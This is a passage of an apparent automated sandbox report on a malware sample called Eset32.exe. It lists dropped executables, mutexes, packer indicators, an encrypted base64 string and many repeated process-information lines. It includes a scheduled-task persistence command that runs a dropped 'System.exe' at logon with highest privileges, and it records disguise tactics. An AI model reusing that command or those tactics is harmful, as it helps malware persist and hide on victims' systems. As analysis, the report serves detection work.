            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: sihost64.exe.26.dr, tbydbmombqjohqmyfjzgtsxmneyqjriqdnvyvzl.csBase64 encoded string: '+tUaXCFqKQxQgYaTvUovoUHuWOpze7zpkxmzwPiHS1L77myXAP8rJGsY9I6PQMsb+fZwXVVGlWTrqMbStrpVAk35i+AMV30GvWG5r1UHh4k=', 'qUlXt0XCgFjywqqcQ7BionrqMZFAbZFKeGeD/yW3QfwQD8GrGpQixpa/AjVFa1tjlv5LsqCxtNRbQwyclnv+ALK2kAMO5ClsHrY6mr+QX4NHnUmntpgNBwSE1ZboXKVqGNgPlCkqVUVcqRmBHf2LKcUgvuzkHXCnq5EG3pJlhOvEDxXOuH0+p+R16B5uae514tBFy8A+c/qE2b4BFisuv5SaPkxO80zvcSsYy1CVIdAESDgjzpJuNHfS4FO7ofJgp8DHkukpaDP1nvBRLO4hJlSlm2O7Uan8s9BJuht2OuvgOJRZHQvGc//aG/FS3Li51Y7fnf3uC+681L6cEP/QxP0wgRY66+vSJ2IkjXTtcZE2zto/7KEy/wai95CI3V7U2OMBwpn1LGwzNfptwdn7EtiDWUXsVYUzMQzkdlwvsUqQe9j+rSM+0ksQMBxLhShSWEFojHGFXcGp4gdi+t+Tq6k5XfJ6KF278pwKXbYrJfpyqW88+rZmTljVfymWcO+DowCaDWI91yo/7k1KrNu04CNOQkw9iGssB42Ppdo9aFEPh24HLXUKBBCoT3w9nlj9'
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_01
            Source: 12.exe, 00000001.00000002.551168109.0000000000C3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
            Source: 4.3.1.exe.2610000.0.unpack, u000fu2001.csCryptographic APIs: 'CreateDecryptor'
            Source: 6.2.AppLaunch.exe.400000.0.unpack, u000fu2001.csCryptographic APIs: 'CreateDecryptor'
            Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.csCryptographic APIs: 'CreateDecryptor'
            Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.csCryptographic APIs: 'CreateDecryptor'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Eset32.exeStatic file information: File size 4139932 > 1048576
            Source: Eset32.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: 1.exe, 00000004.00000003.433262708.0000000002612000.00000040.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.433791167.0000000000114000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 4.3.1.exe.2610000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 6.2.AppLaunch.exe.400000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs.Net Code: stackVariable2.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9F09B6905 pushad ; ret 10_2_00007FF9F09B6909
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9F09B6ABB push ebx; ret 10_2_00007FF9F09B6ACA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9F09B6FFB pushad ; ret 10_2_00007FF9F09B702A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9F09B4FFD push eax; iretd 10_2_00007FF9F09B50A1
            Source: 1.exe.0.drStatic PE information: section name: .QDwHSV
            Source: 1.exe.0.drStatic PE information: section name: .5{mr
            Source: initial sampleStatic PE information: section name: .5{mr entropy: 7.37490232947
            Source: sihost64.exe.26.dr, tbydbmombqjohqmyfjzgtsxmneyqjriqdnvyvzl.csHigh entropy of concatenated method names: 'Main', 'uvoheezyq', 'ddtorxeqzaqxgbwo', 'vuxehejqeitboxwk', 'qxysbnhiviczdhccctzcmvprhcasrtobbs', '.ctor', '.cctor', 'X2ITMCRetNaZuIEaVu', 'jfBHNMAwpHEwauCEtA', 'bJtNW7nClCFlOQmmHt'
            Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.csHigh entropy of concatenated method names: '.cctor', 'Ko4fgi8Si2i54', 'nX3eSP3Yx', 'wQ3NoJxUC', 'BBw0ksC92', 'ITsU20Evp', 'fEMwQFcLn', 'w3Hv3hVNF', 'V5sSwtoHa', 'SjY8mSGyH'
            Source: C:\Users\user\Desktop\Eset32.exeFile created: C:\Users\user\AppData\Roaming\12.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\12.exeFile created: C:\Users\user\AppData\Roaming\Windows\System.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeFile created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exeJump to dropped file
            Source: C:\Users\user\Desktop\Eset32.exeFile created: C:\Users\user\AppData\Roaming\1.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\Desktop\Eset32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
